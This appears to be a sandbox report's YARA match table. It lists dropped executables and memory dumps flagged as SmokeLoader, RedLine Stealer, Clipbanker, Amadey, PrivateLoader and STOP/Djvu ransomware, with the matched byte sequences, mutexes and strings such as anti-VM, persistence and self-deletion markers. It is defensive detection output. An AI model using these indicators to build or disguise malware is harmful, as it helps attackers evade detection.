C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
C:\Users\user\AppData\Local\Temp\oldplayer.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\D5B9.exe	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0x450c9b:$s1: Runner 0x450e00:$s3: RunOnStartup 0x450caf:$a1: Antis 0x450cdc:$a2: antiVM 0x450ce3:$a3: antiSandbox 0x450cef:$a4: antiDebug 0x450cf9:$a5: antiEmulator 0x450d06:$a6: enablePersistence 0x450d18:$a7: enableFakeError 0x450e29:$a8: DetectVirtualMachine 0x450e4e:$a9: DetectSandboxie 0x450e79:$a10: DetectDebugger 0x450e88:$a11: CheckEmulator
C:\Users\user\AppData\Local\Temp\F86F.exe	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0x450c9b:$s1: Runner 0x450e00:$s3: RunOnStartup 0x450caf:$a1: Antis 0x450cdc:$a2: antiVM 0x450ce3:$a3: antiSandbox 0x450cef:$a4: antiDebug 0x450cf9:$a5: antiEmulator 0x450d06:$a6: enablePersistence 0x450d18:$a7: enableFakeError 0x450e29:$a8: DetectVirtualMachine 0x450e4e:$a9: DetectSandboxie 0x450e79:$a10: DetectDebugger 0x450e88:$a11: CheckEmulator
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.379855236.0000000002161000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.379855236.0000000002161000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x3d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000026.00000002.513851805.00000000022D5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000002.463476462.0000000000B20000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.379710237.0000000000620000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x68cf:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001C.00000002.476313714.0000000002730000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000022.00000002.488406614.0000000001BF1000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1158:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.450171034.0000000002000000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.450171034.0000000002000000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x7d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000001C.00000002.478959888.00000000028F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
0000001C.00000002.478959888.00000000028F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000001C.00000002.478959888.00000000028F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000000A.00000002.448327047.00000000021A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000016.00000002.473987426.0000000002660000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
00000016.00000002.473987426.0000000002660000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000016.00000002.473987426.0000000002660000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000029.00000002.497413015.0000000002200000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000013.00000002.475648419.0000000000650000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000010.00000002.452052947.0000000002190000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000013.00000002.475973961.0000000000691000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000013.00000002.475973961.0000000000691000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x244:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000013.00000002.475785512.0000000000660000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000013.00000002.475785512.0000000000660000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x644:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000029.00000002.497631299.00000000023A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
00000029.00000002.497631299.00000000023A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000029.00000002.497631299.00000000023A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000027.00000002.618588057.0000000001361000.00000020.00000001.01000000.00000014.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0xe03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
00000027.00000002.618588057.0000000001361000.00000020.00000001.01000000.00000014.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xafa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 36 01 6A 00 6A 00 FF 15 40 40 36 01 FF 15 2C 40 36 01 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 36 01 0xb87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xb87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0xf35:$regex3: 56 8B F1 56 FF 15 20 40 36 01 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
0000000A.00000002.448562068.0000000002330000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
0000000A.00000002.448562068.0000000002330000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000A.00000002.448562068.0000000002330000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000014.00000002.461647833.0000000002740000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
00000014.00000002.461647833.0000000002740000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000014.00000002.461647833.0000000002740000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000021.00000002.483438291.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
00000021.00000002.483438291.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000021.00000002.483438291.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000021.00000002.483438291.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000004.00000002.450322842.0000000002021000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.450322842.0000000002021000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x3d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000019.00000002.475860220.0000000002700000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
00000019.00000002.475860220.0000000002700000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000019.00000002.475860220.0000000002700000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000004.00000002.449916655.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x68cf:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000023.00000002.485749364.00000000014DA000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x18d33:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
00000023.00000002.485749364.00000000014DA000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x18ddd:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x18e65:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
00000019.00000002.466055067.00000000025E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000005.00000002.441041476.00000000023A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
00000005.00000002.441041476.00000000023A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000005.00000002.441041476.00000000023A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000001E.00000002.477291278.00000000022D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
0000001E.00000002.477291278.00000000022D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000001E.00000002.477291278.00000000022D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000010.00000002.452421978.0000000002250000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
00000010.00000002.452421978.0000000002250000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000010.00000002.452421978.0000000002250000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000000.00000002.379758047.00000000007A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.379758047.00000000007A0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x7d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000015.00000002.461592637.0000000002290000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
